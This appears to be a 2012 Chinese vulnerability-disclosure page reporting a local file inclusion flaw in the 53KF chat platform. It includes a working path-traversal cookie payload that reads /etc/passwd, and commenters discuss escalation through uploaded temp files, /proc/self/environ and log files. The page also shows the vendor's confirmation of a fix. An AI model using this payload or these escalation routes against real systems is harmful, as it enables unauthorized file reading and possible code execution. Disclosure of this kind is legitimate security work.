漏洞概要
关注数(24)
关注此漏洞
漏洞标题:53KF企业在线平台LFI一枚
提交时间:2012-10-14 00:56
修复时间:2012-11-28 00:57
公开时间:2012-11-28 00:57
漏洞类型:文件包含
危害等级:中
自评Rank:8
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2012-10-14: 细节已通知厂商并且等待厂商处理中
2012-10-14: 厂商已经确认,细节仅向厂商公开
2012-10-24: 细节向核心白帽子及相关领域专家公开
2012-11-03: 细节向普通白帽子公开
2012-11-13: 细节向实习白帽子公开
2012-11-28: 细节向公众公开
简要描述:
http://chat.53kf.com/ LFI一枚 配合 http://chat.53kf.com/test.php 的phpinfo信息...导致xxoo..
详细说明:
http://chat.53kf.com/login.php/
修改请求
Cookie: customer_service_language=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
结果:
加上phpinfo提供的信息:
未经授权....不进一步了。。
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2012-10-14 10:58
厂商回复:
感谢对于漏洞的提交,我们会紧急安排修复。谢谢!
最新状态:
暂无
漏洞评价:
评论
-
2012-10-14 12:44 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2012-10-15 12:11 |
komas ( 路人 | Rank:0 漏洞数:1 | 关注web安全)
-
2012-10-15 12:42 |
magerx ( 普通白帽子 | Rank:257 漏洞数:45 | 别说话。)
-
2012-11-03 11:24 |
xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)
楼主意思是include uploaded temp file么,还是include /proc/self/envrion
-
2012-11-03 22:40 |
Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)
@xsjswt access_log error_log ,,,....fd/n
-
2012-11-03 22:42 |
Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)
-
2012-11-03 22:44 |
xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)
-
2012-11-04 00:09 |
Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)
-
2012-11-04 09:09 |
xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)
@Coody 我们这边的配置log文件只有root有权限,不蛤蛤
-
2012-11-04 10:20 |
Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)
-
2012-11-05 11:05 |
西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)
-
2012-11-05 12:43 |
magerx ( 普通白帽子 | Rank:257 漏洞数:45 | 别说话。)
@Coody exploit-db.com有过类似的。
-
2012-11-05 12:59 |
magerx ( 普通白帽子 | Rank:257 漏洞数:45 | 别说话。)
@xsjswt 得看具体权限了。。不过我记得当时/proc/self/envrion 木有成功.
-
2012-11-14 20:07 |
oldsun ( 路人 | Rank:16 漏洞数:4 | 啪啪啪啪啪啪啪啪啪啪啪啪)